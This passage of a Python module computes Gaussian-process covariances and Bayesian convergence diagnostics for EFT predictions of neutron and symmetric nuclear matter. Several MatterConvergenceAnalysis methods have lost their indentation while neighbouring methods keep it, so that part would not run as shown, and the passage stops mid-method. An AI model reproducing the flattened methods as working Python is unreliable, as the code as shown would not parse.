# ax.plot(x, y, ls='', marker='.', markersize=0.6, color=scat_color)
# ax.add_patch(ellipse)
# return ellipse
def lighten_color(color, amount=0.5):
    """
    Lightens the given color by multiplying (1-luminosity) by the given amount.
    Input can be matplotlib color string, hex string, or RGB tuple.
    Examples:
    >> lighten_color('g', 0.3)
    >> lighten_color('#F034A3', 0.6)
    >> lighten_color((.3,.55,.1), 0.5)
    """
    import matplotlib.colors as mc
    import colorsys
    try:
        c = mc.cnames[color]
    except (KeyError, TypeError):
        # Not a named color (e.g. a hex string or an RGB sequence);
        # was a bare `except:`, which hid unrelated errors.
        c = color
    # Work in HLS so only the lightness channel is rescaled
    c = colorsys.rgb_to_hls(*mc.to_rgb(c))
    return colorsys.hls_to_rgb(c[0], 1 - amount * (1 - c[1]), c[2])
def darken_color(color, amount=0.5):
    """
    Darken the given color by multiplying (1-luminosity) by the given amount.
    Input can be matplotlib color string, hex string, or RGB tuple.
    Examples:
    >> darken_color('g', 0.3)
    >> darken_color('#F034A3', 0.6)
    >> darken_color((.3,.55,.1), 0.5)
    """
    # Darkening is lightening with the reciprocal amount
    reciprocal = 1. / amount
    return lighten_color(color, reciprocal)
def cov_no_centering(m, y=None, rowvar=True, bias=False, ddof=None, fweights=None,
                     aweights=None):
    """Estimate a covariance-like matrix *without* subtracting the mean.

    This is a copy of ``numpy.cov`` with the data-centering step removed:
    it returns ``dot(X * w, X.T) / fact`` for the (optionally weighted)
    observation matrix ``X``, where ``fact`` is the same normalization factor
    ``numpy.cov`` would use. All parameters are accepted unchanged and have
    the same meaning as in ``numpy.cov``:

    Parameters
    ----------
    m : array_like
        1-D or 2-D array of variables (rows) and observations (columns, if
        `rowvar` is True).
    y : array_like, optional
        Extra variables/observations of the same form as `m`.
    rowvar : bool, optional
        If True (default) each row is a variable; otherwise each column.
    bias : bool, optional
        Normalize by N if True, else by N - 1 (unless overridden by `ddof`).
    ddof : int, optional
        Explicit delta degrees of freedom; overrides `bias`.
    fweights : array_like, int, optional
        Integer frequency weights per observation.
    aweights : array_like, optional
        Relative observation weights.

    Returns
    -------
    out : ndarray
        The (uncentered) covariance matrix of the variables.
    """
    import warnings

    # --- validate ddof ------------------------------------------------
    if ddof is not None and ddof != int(ddof):
        raise ValueError(
            "ddof must be integer")

    # Handles complex arrays too
    m = np.asarray(m)
    if m.ndim > 2:
        raise ValueError("m has more than 2 dimensions")

    if y is None:
        dtype = np.result_type(m, np.float64)
    else:
        y = np.asarray(y)
        if y.ndim > 2:
            raise ValueError("y has more than 2 dimensions")
        dtype = np.result_type(m, y, np.float64)

    # --- assemble the observation matrix X ----------------------------
    X = np.array(m, ndmin=2, dtype=dtype)
    if not rowvar and X.shape[0] != 1:
        X = X.T
    if X.shape[0] == 0:
        return np.array([]).reshape(0, 0)
    if y is not None:
        y = np.array(y, copy=False, ndmin=2, dtype=dtype)
        if not rowvar and y.shape[0] != 1:
            y = y.T
        X = np.concatenate((X, y), axis=0)

    if ddof is None:
        ddof = 1 if bias == 0 else 0

    # --- combine frequency and reliability weights --------------------
    w = None
    if fweights is not None:
        fweights = np.asarray(fweights, dtype=float)
        if not np.all(fweights == np.around(fweights)):
            raise TypeError(
                "fweights must be integer")
        if fweights.ndim > 1:
            raise RuntimeError(
                "cannot handle multidimensional fweights")
        if fweights.shape[0] != X.shape[1]:
            raise RuntimeError(
                "incompatible numbers of samples and fweights")
        if any(fweights < 0):
            raise ValueError(
                "fweights cannot be negative")
        w = fweights
    if aweights is not None:
        aweights = np.asarray(aweights, dtype=float)
        if aweights.ndim > 1:
            raise RuntimeError(
                "cannot handle multidimensional aweights")
        if aweights.shape[0] != X.shape[1]:
            raise RuntimeError(
                "incompatible numbers of samples and aweights")
        if any(aweights < 0):
            raise ValueError(
                "aweights cannot be negative")
        w = aweights if w is None else w * aweights

    avg, w_sum = np.average(X, axis=1, weights=w, returned=True)
    w_sum = w_sum[0]

    # --- normalization factor (identical to numpy.cov) ----------------
    if w is None:
        fact = X.shape[1] - ddof
    elif ddof == 0:
        fact = w_sum
    elif aweights is None:
        fact = w_sum - ddof
    else:
        fact = w_sum - ddof * sum(w * aweights) / w_sum

    if fact <= 0:
        warnings.warn("Degrees of freedom <= 0 for slice",
                      RuntimeWarning, stacklevel=3)
        fact = 0.0

    # numpy.cov would do `X -= avg[:, None]` here; deliberately skipped.
    X_T = X.T if w is None else (X * w).T
    c = np.dot(X, X_T.conj())
    c *= np.true_divide(1, fact)
    return c.squeeze()
def create_rbf_cross_covariance(X1, X2, std1, std2, ls1, ls2, rho=None):
    """Off-diagonal (cross) covariance block between two RBF processes.

    If `rho` is None, the cross length scale is the RMS of the two length
    scales and the correlation coefficient is derived from them; otherwise
    `rho` is used as given and `ls1` sets the cross kernel's length scale.
    """
    if rho is None:
        ls_sq_sum = ls1 ** 2 + ls2 ** 2
        ls_off = np.sqrt(ls_sq_sum / 2)
        rho = np.sqrt(2 * ls1 * ls2 / ls_sq_sum)
    else:
        ls_off = ls1
    cross_kernel = ConstantKernel(std1 * std2) * RBF(ls_off)
    return rho * cross_kernel(X1, X2)
def create_rbf_multi_covariance(X1, X2, std1, std2, ls1, ls2, nugget=0, rho=None):
    """Full 2x2 block covariance matrix for two correlated RBF processes.

    Builds the diagonal blocks from each process's own kernel and the
    off-diagonal blocks via `create_rbf_cross_covariance`, then adds a
    `nugget` to the diagonal for numerical stability.
    """
    kernel_1 = ConstantKernel(std1 ** 2) * RBF(ls1)
    # When rho is supplied, the second process shares the first length scale
    kernel_2 = ConstantKernel(std2 ** 2) * RBF(ls2 if rho is None else ls1)
    cross = create_rbf_cross_covariance(X1, X2, std1, std2, ls1, ls2, rho=rho)
    K = np.block([
        [kernel_1(X1), cross],
        [cross.T, kernel_2(X2)]
    ])
    K[np.diag_indices_from(K)] += nugget
    return K
def create_truncation_cross_covariance(X1, X2, std1, std2, ls1, ls2, ref1, ref2, Q1, Q2, kmin=0, kmax=None, rho=None):
    """Cross covariance of EFT truncation errors between two observables.

    Scales the RBF cross covariance by each observable's reference scale and
    by a sum over the expansion parameter Q from order `kmin` (up to `kmax`,
    if given; otherwise to all orders).
    """
    cross = create_rbf_cross_covariance(X1, X2, std1, std2, ls1, ls2, rho=rho)
    ref1 = np.atleast_1d(ref1)
    ref2 = np.atleast_1d(ref2)
    # Numerator of the Q sums: Q^kmin, minus Q^(kmax+1) when truncated at kmax
    num1 = Q1 ** kmin
    num2 = Q2 ** kmin
    if kmax is not None:
        num1 = num1 - Q1 ** (kmax + 1)
        num2 = num2 - Q2 ** (kmax + 1)
    sum1 = num1 / np.sqrt(1 - Q1 ** 2)
    sum2 = num2 / np.sqrt(1 - Q2 ** 2)
    return (ref1 * sum1)[:, None] * (ref2 * sum2) * cross
def create_truncation_multi_covariance(
        X1, X2, std1, std2, ls1, ls2, ref1, ref2, Q1, Q2, kmin=0, kmax=None, nugget=0, rho=None):
    """Full 2x2 block covariance of truncation errors for two observables.

    The diagonal blocks are each observable's own truncation-error covariance;
    the off-diagonal blocks come from `create_truncation_cross_covariance`.
    A `nugget` is added to the diagonal for numerical stability.
    """
    ref1 = np.atleast_1d(ref1)
    ref2 = np.atleast_1d(ref2)
    # Work with Q**2 sums; take the square root only after the optional
    # kmax subtraction (squaring first would otherwise lose the sign)
    num1 = Q1 ** (2 * kmin)
    num2 = Q2 ** (2 * kmin)
    if kmax is not None:
        num1 = num1 - Q1 ** (2 * (kmax + 1))
        num2 = num2 - Q2 ** (2 * (kmax + 1))
    sum1 = np.sqrt(num1) / np.sqrt(1 - Q1 ** 2)
    sum2 = np.sqrt(num2) / np.sqrt(1 - Q2 ** 2)
    kernel_1 = ConstantKernel(std1 ** 2) * RBF(ls1)
    # When rho is supplied, the second process shares the first length scale
    kernel_2 = ConstantKernel(std2 ** 2) * RBF(ls2 if rho is None else ls1)
    scale1 = ref1 * sum1
    scale2 = ref2 * sum2
    K1 = scale1[:, None] * scale1 * kernel_1(X1)
    K2 = scale2[:, None] * scale2 * kernel_2(X2)
    K_off = create_truncation_cross_covariance(
        X1, X2, std1, std2, ls1, ls2, ref1, ref2, Q1, Q2, kmin, kmax, rho=rho
    )
    K = np.block([
        [K1, K_off],
        [K_off.T, K2]
    ])
    K[np.diag_indices_from(K)] += nugget
    return K
def create_sym_energy_rbf_covariance(density, std_n, std_s, ls_n, ls_s, nugget=0, rho=None):
    """RBF covariance of the symmetry energy built from neutron & symmetric matter GPs.

    Both inputs are mapped to a common Fermi-momentum scale so that points at
    the *same density* are maximally correlated across the off-diagonal block.
    The choice of convention (here: scaling symmetric matter onto the neutron
    scale) is irrelevant as long as it is applied consistently; otherwise
    high-density points would be less correlated than low-density ones.
    """
    Kf_n = fermi_momentum(density, 2)[:, None]
    # Degeneracy-4 (symmetric matter) kf rescaled onto the neutron-matter scale
    factor = 2. ** (1 / 3.)
    Kf_s = fermi_momentum(density, 4)[:, None] * factor
    if rho is None:
        ls_s = ls_s * factor
    cov = create_rbf_multi_covariance(
        X1=Kf_n, X2=Kf_s, std1=std_n, std2=std_s, ls1=ls_n, ls2=ls_s, nugget=nugget, rho=rho
    )
    N = len(density)
    # Symmetry energy is a difference of the two observables, hence
    # var = var_n + var_s - cov_ns - cov_sn
    return cov[:N, :N] + cov[N:, N:] - cov[:N, N:] - cov[N:, :N]
def create_sym_energy_truncation_covariance(
        density, std_n, std_s, ls_n, ls_s, ref_n, ref_s, Q_n, Q_s, kmin=0, kmax=None, nugget=0, rho=None,
        ignore_corr=False):
    """Truncation-error covariance of the symmetry energy.

    Mirrors `create_sym_energy_rbf_covariance`, but for the EFT truncation
    errors: both systems are mapped to a common Fermi-momentum scale so that
    equal-density points are maximally correlated across the cross block.
    If `ignore_corr` is True the two systems are treated as uncorrelated
    (cross blocks dropped).
    """
    Kf_n = fermi_momentum(density, 2)[:, None]
    # Degeneracy-4 (symmetric matter) kf rescaled onto the neutron-matter scale
    factor = 2. ** (1 / 3.)
    Kf_s = fermi_momentum(density, 4)[:, None] * factor
    if rho is None:
        ls_s = ls_s * factor
    cov = create_truncation_multi_covariance(
        X1=Kf_n, X2=Kf_s, std1=std_n, std2=std_s, ls1=ls_n, ls2=ls_s,
        ref1=ref_n, ref2=ref_s, Q1=Q_n, Q2=Q_s, kmin=kmin, kmax=kmax, nugget=nugget, rho=rho
    )
    N = len(density)
    cov_nn = cov[:N, :N]
    cov_ss = cov[N:, N:]
    if ignore_corr:
        return cov_nn + cov_ss
    return cov_nn + cov_ss - cov[:N, N:] - cov[N:, :N]
@docstrings.get_sectionsf('ConvergenceAnalysis')
@docstrings.dedent
class ConvergenceAnalysis:
    R"""A generic class for studying convergence of observables.
    This is meant to provide the framework for particular analyses, which should subclass this class.
    Parameters
    ----------
    X : ndarray, shape = (N,p)
        The feature matrix
    y : ndarray, shape = (N, n_curves)
        The response curves
    orders : ndarray, shape = (n_orders,)
    train : ndarray, shape = (N,)
        A boolean array that is `True` if that point is to be used to train the convergence model.
    valid : ndarray, shape = (N,)
        A boolean array that is `True` if that point is to be used to validate the convergence model.
    ref : float or callable
        The reference scale
    ratio : float or callable
        The ratio Q
    excluded : ndarray, optional
        The orders for which the coefficients should not be used in training the convergence model.
    colors : ndarray, optional
        Colors for plotting orders and their diagnostics.
    Other Parameters
    ----------------
    %(ConjugateGaussianProcess.parameters)s
    """

    def __init__(self, X, y2, y3, orders, train, valid, ref2, ref3, ratio, body, *, excluded=None, colors=None, **kwargs):
        self.X = X
        self.orders_original = np.atleast_1d(orders)

        # Plot styling conventions: 2-body data uses filled markers / solid lines,
        # 3-body contributions use half-filled markers / dashed lines.
        # NOTE(review): marker_list has 4 entries, which assumes len(orders) <= 4 — confirm.
        marker_list = ['^', 'X', 'o', 's']
        markerfillstyle_2bf = 'full'
        markerfillstyle_3bf = 'left'
        linestyle_2bf = '-'
        linestyle_3bf = '--'
        colors_original = colors
        if body == 'Appended':
            # Split every order into its 2-body prediction and (for orders with
            # 3-body forces) its 3-body correction, then recombine via partial sums.
            print('Appending 2bf and 3bf predictions...')
            try:
                ref3_vals = ref3(X)
            except TypeError:
                ref3_vals = ref3
            try:
                ref2_vals = ref2(X)
            except TypeError:
                ref2_vals = ref2
            try:
                ratio_vals = ratio(X)
            except TypeError:
                ratio_vals = ratio
            c2 = gm.coefficients(y2, ratio_vals, ref2_vals, orders)
            c3 = gm.coefficients(y3 - y2, ratio_vals, ref3_vals, orders)
            c = []
            colors_all = []
            orders_all = []
            markers = []
            markerfillstyles = []
            linestyles = []
            n_bodies = []
            for i, n in enumerate(orders):
                c.append(c2[:, i])
                orders_all.append(n)
                colors_all.append(colors[i])
                markers.append(marker_list[i])
                markerfillstyles.append(markerfillstyle_2bf)
                linestyles.append(linestyle_2bf)
                n_bodies.append('2')
                if n > 2:  # Has 3-body forces
                    c.append(c3[:, i])
                    orders_all.append(n)
                    colors_all.append(colors[i])
                    markers.append(marker_list[i])
                    markerfillstyles.append(markerfillstyle_3bf)
                    linestyles.append(linestyle_3bf)
                    n_bodies.append('3')
            c = np.array(c).T
            orders_all = np.array(orders_all)
            print(f'Reseting orders to be {orders_all}')
            y = gm.partials(c, ratio_vals, ref2_vals, orders_all)
            self.y = y
            self.orders = orders_all
            self.ref = ref2
        elif body == 'NN-only':
            self.y = y2
            self.orders = orders
            self.ref = ref2
            colors_all = colors
            markerfillstyles = [markerfillstyle_2bf] * len(orders)
            linestyles = [linestyle_2bf] * len(orders)
            n_bodies = ['2'] * len(orders)
            markers = marker_list
        elif body == 'NN+3N':
            self.y = y3
            self.orders = orders
            # NOTE(review): uses ref2 even for NN+3N — looks intentional
            # (2-body reference convention), but confirm.
            self.ref = ref2
            colors_all = colors
            markerfillstyles = [markerfillstyle_2bf] * len(orders)
            linestyles = [linestyle_2bf] * len(orders)
            # n_bodies = ['2+3'] * len(orders)
            n_bodies = [None] * len(orders)
            markers = marker_list
        elif body == '3N':
            self.y = y3 - y2
            self.orders = orders
            self.ref = ref3
            colors_all = colors
            markerfillstyles = [markerfillstyle_3bf] * len(orders)
            linestyles = [linestyle_3bf] * len(orders)
            n_bodies = ['3'] * len(orders)
            markers = marker_list
        else:
            raise ValueError('body not in allowed values')

        self.train = train
        self.valid = valid
        self.X_train = X[train]
        self.X_valid = X[valid]
        self.y2 = y2
        if body != '3N':
            self.y2_train = y2[train]
            self.y2_valid = y2[valid]
        else:
            self.y2_train = None
            # BUG FIX: previously assigned self.y2_train twice, leaving
            # self.y2_valid undefined in the '3N' branch.
            self.y2_valid = None
        self.y3 = y3
        if body != 'NN-only':
            self.y3_train = y3[train]
            self.y3_valid = y3[valid]
        else:
            self.y3_train = None
            # BUG FIX: previously assigned self.y3_train twice, leaving
            # self.y3_valid undefined in the 'NN-only' branch.
            self.y3_valid = None
        self.y_train = self.y[train]
        self.y_valid = self.y[valid]
        self.n_bodies = n_bodies
        self.ratio = ratio
        # self.ref = ref
        self.ref2 = ref2
        self.ref3 = ref3

        # Masks selecting the orders whose coefficients train the model
        self.excluded = excluded
        if excluded is None:
            excluded_mask = np.ones_like(self.orders, dtype=bool)
        else:
            excluded_mask = ~np.isin(self.orders, excluded)
        self.excluded_mask = excluded_mask
        self.orders_not_excluded = self.orders[excluded_mask]
        if excluded is None:
            excluded_mask_original = np.ones_like(orders, dtype=bool)
        else:
            excluded_mask_original = ~np.isin(orders, excluded)
        self.excluded_mask_original = excluded_mask_original
        colors_all = np.atleast_1d(colors_all)
        self.colors_not_excluded = colors_all[excluded_mask]
        self.colors = colors_all
        self.colors_original = colors_original = np.atleast_1d(colors_original)
        self.colors_original_not_excluded = colors_original[excluded_mask_original]
        self.orders_original_not_excluded = self.orders_original[excluded_mask_original]
        self.markers = markers = np.atleast_1d(markers)
        self.markers_not_excluded = markers[excluded_mask]
        self.markerfillstyles = markerfillstyles = np.atleast_1d(markerfillstyles)
        self.markerfillstyles_not_excluded = markerfillstyles[excluded_mask]
        self.linestyles = linestyles = np.atleast_1d(linestyles)
        self.linestyles_not_excluded = linestyles[excluded_mask]
        self.kwargs = kwargs

    def compute_coefficients(self, show_excluded=False, **kwargs):
        """Extract the expansion coefficients of `self.y`.

        Parameters
        ----------
        show_excluded : bool, optional
            If False (default), columns for excluded orders are dropped.
        **kwargs
            Forwarded to `self.ratio` (e.g. the breakdown scale).
        """
        ratio = self.ratio(self.X, **kwargs)
        try:
            ref = self.ref(self.X)
        except TypeError:
            # ref is a plain number rather than a callable
            ref = self.ref
        c = gm.coefficients(self.y, ratio, ref, self.orders)
        if not show_excluded:
            c = c[:, self.excluded_mask]
        return c

    def plot_coefficients(self, *args, **kwargs):
        # Subclasses must provide the concrete plotting implementation.
        raise NotImplementedError

    def plot_pchol(self):
        pass

    def plot_md_squared(self):
        pass
@docstrings.dedent
class MatterConvergenceAnalysis(ConvergenceAnalysis):
    """A convenience class to compute quantities related to nuclear matter convergence
    Parameters
    ----------
    %(ConvergenceAnalysis.parameters)s
    density : ndarray
    system : str
        The physical system to consider. Can be 'neutron', 'symmetric', or 'difference'. Affects how to convert
        between kf and density, and also the way that files are named.
    fit_n2lo : str
        The fit number for the NN+3N N2LO potential. Used for naming files.
    fit_n3lo : str
        The fit number for the NN+3N N3LO potential. Used for naming files.
    Lambda : int
        The Lambda regulator for the potential. Used for naming files.
    body : str
        Either 'NN-only' or 'NN+3N'
    savefigs : bool, optional
        Whether to save figures when plot_* is called. Defaults to `False`
    Other Parameters
    ----------------
    %(ConvergenceAnalysis.other_parameters)s
    """
    # Long-form system names used in figure file names
    system_strings = dict(
        neutron='neutron',
        symmetric='symmetric',
        difference='difference',
    )
    # One-letter system tags used in compact file names
    system_strings_short = dict(
        neutron='n',
        symmetric='s',
        difference='d',
    )
    # LaTeX observable names per system (E/N, E/A, S_2)
    system_math_strings = dict(
        neutron='E/N',
        symmetric='E/A',
        difference='S_2',
    )
    # Maps the `ratio` constructor string to the actual ratio function
    ratio_map = dict(
        kf=ratio_kf
    )
    # LaTeX labels for the model-checking diagnostics
    MD_label = r'\mathrm{D}_{\mathrm{MD}}^2'
    PC_label = r'\mathrm{D}_{\mathrm{PC}}'
    CI_label = r'\mathrm{D}_{\mathrm{CI}}'
def __init__(self, X, y2, y3, orders, train, valid, ref2, ref3, ratio, density, *, system='neutron',
fit_n2lo=None, fit_n3lo=None, Lambda=None, body=None, savefigs=False,
fig_path='new_figures', **kwargs):
self.ratio_str = ratio
ratio = self.ratio_map[ratio]
color_list = ['Oranges', 'Greens', 'Blues', 'Reds', 'Purples', 'Greys']
cmaps = [plt.get_cmap(name) for name in color_list[:len(orders)]]
colors = [cmap(0.55 - 0.1 * (i == 0)) for i, cmap in enumerate(cmaps)]
body_vals = ['NN-only', 'NN+3N', '3N', 'Appended']
if body not in body_vals:
raise ValueError(f'body must be in {body_vals}')
# TODO: allow `excluded` to work properly in plots, etc.
super().__init__(
X, y2, y3, orders, train, valid, ref2, ref3, ratio, body=body, colors=colors, **kwargs)
self.system = system
self.fit_n2lo = fit_n2lo
self.fit_n3lo = fit_n3lo
self.Lambda = Lambda
self.body = body
self.savefigs = savefigs
self.fig_path = fig_path
self.system_math_string = self.system_math_strings[system]
self.density = density
self.df_joint = None
self.df_breakdown = None
self.df_ls = None
self.breakdown = None
self.breakdown_min, self.breakdown_max, self.breakdown_num = None, None, None
self.ls_min, self.ls_max, self.ls_num = None, None, None
self._breakdown_map = None
self._ls_map = None
self.ls = None
self.max_idx = None
self.logprior = None
def compute_density(self, kf):
degeneracy = None
if self.system == 'neutron':
degeneracy = 2
elif self.system == 'symmetric':
# print('warning: assuming neutron matter for testing')
# degeneracy = 2
degeneracy = 4
elif self.system == 'difference':
raise ValueError('not sure what to do for symmetry energy')
return nuclear_density(kf, degeneracy)
def compute_momentum(self, density):
degeneracy = None
if self.system == 'neutron':
degeneracy = 2
elif self.system == 'symmetric':
# print('warning: assuming neutron matter for testing')
# degeneracy = 2
degeneracy = 4
elif self.system == 'difference':
raise ValueError('not sure what to do for symmetry energy')
return fermi_momentum(density, degeneracy)
    def setup_posteriors(self, max_idx, breakdown_min, breakdown_max, breakdown_num, ls_min, ls_max, ls_num,
                         logprior=None, max_idx_labels=None):
        R"""Computes and stores the values for the breakdown and length scale posteriors.
        This must be run before running functions that depend on these posteriors.
        Parameters
        ----------
        max_idx : List[int], int
            All orders up to self.orders[:max_idx+1] are kept and used to compute posteriors. If a list is provided,
            then the posterior is computed for each of the max_indices in the list.
        breakdown_min : float
            The minimum value for the breakdown scale. Will be used to compute
            `np.linspace(breakdown_min, breakdown_max, breakdown_num)`.
        breakdown_max : float
            The maximum value for the breakdown scale. Will be used to compute
            `np.linspace(breakdown_min, breakdown_max, breakdown_num)`.
        breakdown_num : int
            The number of breakdown scale values to use in the posterior. Will be used to compute
            `np.linspace(breakdown_min, breakdown_max, breakdown_num)`.
        ls_min : float
            The minimum value for the length scale. Will be used to compute
            `np.linspace(ls_min, ls_max, ls_num)`. if `ls_min`, `ls_max`, and `ls_num` are all `None`, then
            the MAP value of the length scale will be used for the breakdown posterior. No length scale posterior
            will be computed in this case.
        ls_max : float
            The maximum value for the length scale. Will be used to compute
            `np.linspace(ls_min, ls_max, ls_num)`. if `ls_min`, `ls_max`, and `ls_num` are all `None`, then
            the MAP value of the length scale will be used for the breakdown posterior. No length scale posterior
            will be computed in this case.
        ls_num : int
            The number of length scales to use in the posterior. Will be used to compute
            `np.linspace(ls_min, ls_max, ls_num)`. if `ls_min`, `ls_max`, and `ls_num` are all `None`, then
            the MAP value of the length scale will be used for the breakdown posterior. No length scale posterior
            will be computed in this case.
        logprior : ndarray, optional, shape = (ls_num, breakdown_num)
            The prior pr(breakdown, ls). If `None`, then a flat prior is used.
        Returns
        -------
        """
        dfs_breakdown = []
        dfs_ls = []
        dfs_joint = []
        self.breakdown_min, self.breakdown_max, self.breakdown_num = breakdown_min, breakdown_max, breakdown_num
        self.ls_min, self.ls_max, self.ls_num = ls_min, ls_max, ls_num
        breakdown = np.linspace(breakdown_min, breakdown_max, breakdown_num)
        # All three ls_* must be None to skip the length-scale posterior entirely
        if ls_min is None and ls_max is None and ls_num is None:
            ls = None
        else:
            ls = np.linspace(ls_min, ls_max, ls_num)
        breakdown_maps = []
        ls_maps = []
        max_idx = np.atleast_1d(max_idx)
        if max_idx_labels is None:
            max_idx_labels = max_idx
        # One posterior computation per requested maximum order
        for idx, idx_label in zip(max_idx, max_idx_labels):
            joint_pdf, breakdown_pdf, ls_pdf = self.compute_breakdown_ls_posterior(
                breakdown, ls, max_idx=idx, logprior=logprior)
            df_breakdown = pd.DataFrame(np.array([breakdown, breakdown_pdf]).T, columns=[r'$\Lambda_b$ [MeV]', 'pdf'])
            df_breakdown['Order'] = fr'N$^{idx_label}$LO'
            df_breakdown['Order Index'] = idx
            df_breakdown['system'] = fr'${self.system_math_string}$'
            df_breakdown['Body'] = self.body
            dfs_breakdown.append(df_breakdown)
            if ls is not None:
                df_ls = pd.DataFrame(np.array([ls, ls_pdf]).T, columns=[r'$\ell$ [fm$^{-1}$]', 'pdf'])
                df_ls['Order'] = fr'N$^{idx_label}$LO'
                df_ls['Order Index'] = idx
                df_ls['system'] = fr'${self.system_math_string}$'
                df_ls['Body'] = self.body
                dfs_ls.append(df_ls)
            # The joint pdf is stored flattened over the (ls, breakdown) grid
            X = gm.cartesian(ls, breakdown)
            df_joint = pd.DataFrame(X, columns=[r'$\ell$ [fm$^{-1}$]', r'$\Lambda_b$ [MeV]'])
            df_joint['pdf'] = joint_pdf.ravel()
            df_joint['Order'] = fr'N$^{idx_label}$LO'
            df_joint['Order Index'] = idx
            df_joint['system'] = fr'${self.system_math_string}$'
            df_joint['Body'] = self.body
            dfs_joint.append(df_joint)
            # MAP point of the joint posterior: axis 0 indexes ls, axis 1 breakdown
            map_idx = np.argmax(joint_pdf)
            map_idx = np.unravel_index(map_idx, joint_pdf.shape)
            breakdown_maps.append(breakdown[map_idx[1]])
            if ls is not None:
                ls_maps.append(ls[map_idx[0]])
        df_breakdown = pd.concat(dfs_breakdown, ignore_index=True)
        df_ls = None
        if ls is not None:
            df_ls = pd.concat(dfs_ls, ignore_index=True)
        df_joint = pd.concat(dfs_joint, ignore_index=True)
        # Cache everything for later plotting / lookup
        self.breakdown = breakdown
        self.ls = ls
        self.logprior = logprior
        self.max_idx = max_idx
        self.max_idx_labels = max_idx_labels
        self.df_joint = df_joint
        self.df_breakdown = df_breakdown
        self.df_ls = df_ls
        self._breakdown_map = breakdown_maps
        self._ls_map = ls_maps
        return df_joint, df_breakdown, df_ls
    @property
    def breakdown_map(self):
        # MAP breakdown-scale values found by setup_posteriors (one per max_idx entry)
        return self._breakdown_map
    @property
    def ls_map(self):
        # MAP length-scale values found by setup_posteriors (one per max_idx entry)
        return self._ls_map
def compute_underlying_graphical_diagnostic(self, breakdown, show_excluded=False, interp=False, kernel=None):
coeffs = coeffs_not_excluded = self.compute_coefficients(
breakdown=breakdown, show_excluded=show_excluded
)
colors = self.colors
markerfillstyles = self.markerfillstyles
markers = self.markers
if not show_excluded:
colors = self.colors_not_excluded
markerfillstyles = self.markerfillstyles_not_excluded
markers = self.markers_not_excluded
coeffs_not_excluded = self.compute_coefficients(breakdown=breakdown, show_excluded=False)
gp_kwargs = self.kwargs.copy()
if kernel is not None:
gp_kwargs['kernel'] = kernel
process = gm.ConjugateGaussianProcess(**gp_kwargs)
process.fit(self.X_train, coeffs_not_excluded[self.train]) # in either case, only fit to non-excluded coeffs
if interp:
mean, cov = process.predict(self.X_valid, return_cov=True, pred_noise=True)
# print(mean.shape, mean)
# print(cov)
data = coeffs[self.valid] - mean
mean = np.zeros(len(mean))
else:
mean = process.mean(self.X_valid)
cov = process.cov(self.X_valid)
data = coeffs[self.valid]
# print(mean.shape, mean)
# print(data)
# But it may be useful to visualize the diagnostics off all coefficients
graph = gm.GraphicalDiagnostic(
data, mean, cov, colors=colors, gray=gray, black=softblack,
markerfillstyles=markerfillstyles, markers=markers
)
return graph
def compute_breakdown_ls_posterior(self, breakdown, ls, max_idx=None, logprior=None):
# orders = self.orders[:max_idx + 1]
orders = self.orders
model = gm.TruncationGP(ref=self.ref, ratio=self.ratio, excluded=self.excluded, **self.kwargs)
X = self.X_train
data = self.y_train
joint_pdf, Lb_pdf, ls_pdf = compute_2d_posterior(
model, X, data, orders, breakdown, ls, logprior=logprior, max_idx=max_idx,
)
return joint_pdf, Lb_pdf, ls_pdf
def compute_best_length_scale_for_breakdown(self, breakdown, max_idx):
ord = rf'N$^{max_idx}$LO'
df_best = self.df_joint[
(self.df_joint[r'$\Lambda_b$ [MeV]'] == breakdown) &
(self.df_joint['Order'] == ord)
]
ls_max_idx = df_best['pdf'].idxmax()
return df_best.loc[ls_max_idx][r'$\ell$ [fm$^{-1}$]']
def order_index(self, order):
return np.squeeze(np.argwhere(self.orders == order))
def setup_and_fit_truncation_process(self, breakdown):
model = gm.TruncationGP(
ratio=self.ratio, ref=self.ref, excluded=self.excluded,
ratio_kws=dict(breakdown=breakdown), **self.kwargs
)
# Only update hyperparameters based on train
model.fit(self.X_train, y=self.y_train, orders=self.orders)
return model
    def compute_minimum(self, order, n_samples, breakdown=None, X=None, nugget=0, cond=None):
        """Sample the minimum of the truncation-GP interpolant at a given order.

        Fits a truncation GP on the training points, conditions on the `cond`
        points for interpolation, (for 'Appended') augments the covariance
        with the 3-body truncation error, and draws `n_samples` curves whose
        minima are returned along with the interpolant's own minimum.

        Returns
        -------
        x_min_no_trunc, y_min_no_trunc, x_min, y_min, pred, cov
        """
        if X is None:
            X = self.X
        if breakdown is None:
            breakdown = self.breakdown_map[-1]
        if cond is None:
            cond = self.train
        x = X.ravel()
        # ord = self.orders == order
        orders = self.orders_original
        # colors = self.colors_original
        # Select the raw predictions matching the body convention
        if self.body == 'NN-only':
            y = self.y2
        elif self.body == 'NN+3N':
            y = self.y3
        elif self.body == 'Appended':
            y = self.y3
        elif self.body == '3N':
            y = self.y3
        else:
            raise ValueError('body not in allowed values')
        ord = np.squeeze(np.argwhere(orders == order))
        if ord.ndim > 0:
            raise ValueError('Found multiple orders that match order')
        model = gm.TruncationGP(
            ratio=self.ratio, ref=self.ref, excluded=self.excluded,
            ratio_kws=dict(breakdown=breakdown), **self.kwargs
        )
        # Only update hyperparameters based on train
        model.fit(self.X_train, y=self.y_train, orders=self.orders)
        print(model.coeffs_process.kernel_)
        # But then condition on `cond` X, y points to get a good interpolant
        pred, cov = model.predict(X, order=order, return_cov=True, Xc=self.X[cond], y=y[cond, ord], kind='both')
        if self.body == 'Appended':
            try:
                ref3_vals = self.ref3(X)
            except TypeError:
                # ref3 is a plain number rather than a callable
                ref3_vals = self.ref3
            try:
                ref2_vals = self.ref2(X)
            except TypeError:
                ref2_vals = self.ref2
            ref2_vals = np.atleast_1d(ref2_vals)
            ref3_vals = np.atleast_1d(ref3_vals)
            # For appended, the standard reference is the 2-body one. So swap for the 3-body ref
            cov_3bf = cov * (ref3_vals[:, None] * ref3_vals) / (ref2_vals[:, None] * ref2_vals)
            cov = cov + cov_3bf
        # pred, cov = model.predict(X, order=order, return_cov=True, kind='both')
        # pred += self.y[:, ord]
        # cov += np.diag(cov) * nugget * np.eye(cov.shape[0])
        # Sample curve minima; the nugget regularizes the covariance for sampling
        x_min, y_min = minimum_samples(pred, (cov + nugget * np.eye(cov.shape[0])), n=n_samples, x=x)
        # Drop draws whose minimum sits on the right edge of the grid
        is_endpoint = x_min == X[-1].ravel()
        x_min = x_min[~is_endpoint]
        y_min = y_min[~is_endpoint]
        # Don't interpolate
        # min_idx = np.argmin(self.y[:, ord])
        # x_min_no_trunc, y_min_no_trunc = self.X.ravel()[min_idx], self.y[min_idx][ord]
        # Do interpolate
        min_idx = np.argmin(pred)
